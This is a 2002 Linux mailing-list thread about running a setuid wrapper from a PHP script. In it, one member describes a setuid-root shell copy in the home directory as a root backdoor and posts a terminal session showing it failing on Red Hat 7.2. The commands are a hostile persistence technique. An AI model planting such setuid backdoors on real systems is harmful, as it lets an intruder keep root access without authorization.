[ale] Please Help
Chris Fowler
cfowler at outpostsentinel.com
Thu Mar 28 15:49:25 EST 2002
I was not pointing fingers. I was making a comment that if I did the
commands in my email that
I would no gain root access. I should have gained root.
[root at cfowler root]# cd /home/cfowler
[root at cfowler cfowler]# cp /bin/bahs .sh
cp: cannot stat `/bin/bahs': No such file or directory
[root at cfowler cfowler]# cp /bin/bash .sh
[root at cfowler cfowler]# chmod 4755 .sh
[root at cfowler cfowler]# su - cfowler
[cfowler at cfowler cfowler]$ ./sh
bash: ./sh: No such file or directory
[cfowler at cfowler cfowler]$ ./.sh
.sh-2.05$ exit
exit
[cfowler at cfowler cfowler]$ ls -l .sh
-rwsr-xr-x 1 root root 519964 Mar 28 14:08 .sh
[cfowler at cfowler cfowler]$
[cfowler at cfowler cfowler]$ ./.sh
.sh-2.05$ cd /root
.sh: cd: /root: Permission denied
.sh-2.05$
Notice how I do not have root even though my shell is 4755 and owned by
root.
Chris
-----Original Message-----
From: Ken Nagorski [mailto:kenn at pcintelligent.com]
To: ale at ale.org
Sent: Thursday, March 28, 2002 3:32 PM
To: cfowler at outpostsentinel.com
Subject: RE: [ale] Please Help
Hi there,
Yes - I understand that there are security risks, however the perl scritp
does some very harsh integrity checking before is runs any commands so I am
not to worried...
Thanks
ken
> You bring up a good point. I was showing a friend a very simple
> root exploit. Heres how it goes:
>
> 1) cp /bin/sh ~/.sh
> 2) chown root ~./sh
> 3) chmod 4755 ~/.sh
>
> You have to gain root access once to make it work. Then every time you
> log into the machien as a normal user just excute the suid shell. On
> old linux distros this trick works. I can not get it to work on RH
> 7.2. Not sure why.
>
> Chris
>
> -----Original Message-----
> From: Ken Nagorski [mailto:kenn at pcintelligent.com]
> Sent: Thursday, March 28, 2002 3:05 PM
> To: ale at ale.org
> Subject: [ale] Please Help
>
>
> Please tell me someone knows how to do this. Here is the problem.
>
> I need to a script SUID form a website. It is a PHP script that calls a
> wrapper program written in C and it is set 4755, The script is calls
> just runs a system command, actually a courier command, the makealises
> command. But I can't get this to work for the life of me. I know that
> someone has had of written the script that simplifies system mamagment
> and then needed to run a system command when it is finished but HOW?
>
> Uhg - Thanks
> Ken
>
>
>
>
> ---
> This message has been sent through the ALE general discussion list. See
> http://www.ale.org/mailing-lists.shtml for more info. Problems should
> be sent to listmaster at ale dot org.
>
>
>
>
> ---
> This message has been sent through the ALE general discussion list. See
> http://www.ale.org/mailing-lists.shtml for more info. Problems should
> be sent to listmaster at ale dot org.
---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be
sent to listmaster at ale dot org.
More information about the Ale
mailing list